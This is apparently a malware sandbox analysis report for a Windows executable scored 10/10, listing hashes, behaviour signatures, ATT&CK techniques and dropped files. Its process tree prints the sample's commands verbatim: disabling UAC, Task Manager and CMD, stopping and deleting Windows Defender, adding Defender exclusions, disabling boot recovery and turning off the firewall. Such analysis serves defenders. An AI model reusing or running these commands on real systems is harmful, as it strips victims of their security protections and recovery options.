Overview

overview

10

Static

static

10

0778d2ae60...93.exe

windows10-2004-x64

10

2005110ee8...24.exe

windows10-2004-x64

10

290072a9e1...51.exe

windows10-2004-x64

10

3998d0e987...7f.exe

windows10-2004-x64

10

435844f4e1...2b.exe

windows10-2004-x64

3

495fbfecbc...72.exe

windows10-2004-x64

1

542c157186...88.exe

windows10-2004-x64

10

561d7f0505...35.exe

windows10-2004-x64

10

617364875d...bb.exe

windows10-2004-x64

3

6312ac9176...d8.exe

windows10-2004-x64

10

63545fa195...8a.exe

windows10-2004-x64

10

6555038a04...42.exe

windows10-2004-x64

10

677393ff5e...59.exe

windows10-2004-x64

1

680caf0e30...75.exe

windows10-2004-x64

10

70192d461c...8b.exe

windows10-2004-x64

3

76199c2662...6d.exe

windows10-2004-x64

3

8727091cbb...44.exe

windows10-2004-x64

10

91450f9e8a...dc.exe

windows10-2004-x64

9

93386ea79c...b9.exe

windows10-2004-x64

6

942bc9e43e...7c.exe

windows10-2004-x64

10

ac7a29cb82...b8.exe

windows10-2004-x64

10

baa851154b...1f.exe

windows10-2004-x64

10

bb5ca9d8de...69.exe

windows10-2004-x64

10

c15e2ffa84...07.exe

windows10-2004-x64

10

c743ba0861...26.exe

windows10-2004-x64

cfda742c2d...e5.exe

windows10-2004-x64

10

d1d74ec103...34.exe

windows10-2004-x64

1

d765e722e2...b9.exe

windows10-2004-x64

10

daa41f5230...de.exe

windows10-2004-x64

9

ed12ea76d0...0a.exe

windows10-2004-x64

10

f062577b68...e0.exe

windows10-2004-x64

10

f244a04265...35.exe

windows10-2004-x64

10

Resubmissions

13-07-2024 09:54

240713-lxcvgawdmn 10

13-07-2024 09:52

240713-lv46yawdkj 10

13-07-2024 09:46

240713-lrz3tayajc 10

Analysis

  • max time kernel
    1794s
  • max time network
    1156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-07-2024 09:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe

  • Size

    3.8MB

  • MD5

    15995b0b1fc5dd82f1c3ba1b7b40c5d4

  • SHA1

    3b6a4a5b8b1107854e35b01cd28b4cce7a003413

  • SHA256

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35

  • SHA512

    4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781

  • SSDEEP

    49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Score
10/10
evasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4908
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:3560
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2176
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4148
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4688
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2564
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4040
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1112
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4004
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3604

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    2
    T1562

    Disable or Modify System Firewall

    1
    T1562.004

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e5bfec1063a497048fffb231a0621403

      SHA1

      97cf6a89f237f43b9c22e3e081f7d45924d435ba

      SHA256

      325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

      SHA512

      e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      03353f9d8fe5db8d1c03fa41447cab10

      SHA1

      f1a6693a0c85bda6192c29ae35315072618dedef

      SHA256

      c42a38f755a9222b9937ca4f0a97711a4f2cbb4d52103e9a70522ff0454535b3

      SHA512

      d4e1d14a95cc5c58ef57cff55f922cee893e6c3658b60f7ac86689477792148696a2faf97d22bf053dc84174ed73adfeb5e97cb5db560a6361724a509026d9a7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      df4d87b6845d3fddf6e659396aea0757

      SHA1

      a636715074a17bb786eca83543fb685219f23f57

      SHA256

      0ea4203b826c4795e76f169fb364d512d3b03426c1e82719c6ec3b3446187f70

      SHA512

      df4d70ef157b2dafce200cea052f0509d821d14f5cbcf7704149275a3e863ed7bfcda8d7f91b5539aa899c902a5743d13bc01f07797f4b0b564cefff5c36b7c4

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      235a8eb126d835efb2e253459ab8b089

      SHA1

      293fbf68e6726a5a230c3a42624c01899e35a89f

      SHA256

      5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

      SHA512

      a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      38f0f14cc7ca72ad51216866e66efb4e

      SHA1

      34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

      SHA256

      668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

      SHA512

      4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      ef5ef35c3059825861b16409862d0e3d

      SHA1

      cde5311765478b1bcf309219c1a86a0238612099

      SHA256

      53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

      SHA512

      3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      90a46602aee7837d9bde97b5842a5844

      SHA1

      0aa5875544d05d14cc2f06f9715ebcf5c3656993

      SHA256

      6a6a5f36d7547aa35c2e8f8c4ad359aa15e6a4d3fe5a4c5feca5d9edbd5864d2

      SHA512

      4f74f446047e2cbe9c29c33db3cf3453b91eaa2e086f88ee908e6238544325d96fb5170e991f8a09d3d48a961f8672fd123be5b5b982832f64382af926ffc11a

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      214049bdc8d473528180bb22e9fa3ce8

      SHA1

      243a406d6918c60e2763c2205592ff01ea2f6419

      SHA256

      0d5507fa72fa731e53374f15752bcd6204889a80174b7d61bbd2256e7caad424

      SHA512

      dceeb8a4a1ac2b9d195c5b6480d9de0543823ac20c8e1b0c7b3851a625ed0d321e41cfd106198701f9bfce08e75bcc249a226171af3b9bafa9983e168d14c332

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      Filesize

      247KB

      MD5

      5cae01aea8ed390ce9bec17b6c1237e4

      SHA1

      3a80a49efaac5d839400e4fb8f803243fb39a513

      SHA256

      19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

      SHA512

      c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xe4qhm2n.dju.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\prorun.bat
      Filesize

      2KB

      MD5

      0f887625226181fb0136e6145919e56a

      SHA1

      1477b214aafcf9a518f7a13832da00d639f22943

      SHA256

      8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8

      SHA512

      81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

      Download Submit

    • memory/4520-28-0x0000021B8EDB0000-0x0000021B8EDD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4908-0-0x00007FF9E3D13000-0x00007FF9E3D15000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4908-1-0x0000028E69BA0000-0x0000028E69F76000-memory.dmp

      Filesize

      3.8MB

      Download

    • memory/4908-140-0x0000028E6BDA0000-0x0000028E6BDC0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4908-141-0x0000028E6C640000-0x0000028E6C64A000-memory.dmp

      Filesize

      40KB

      Download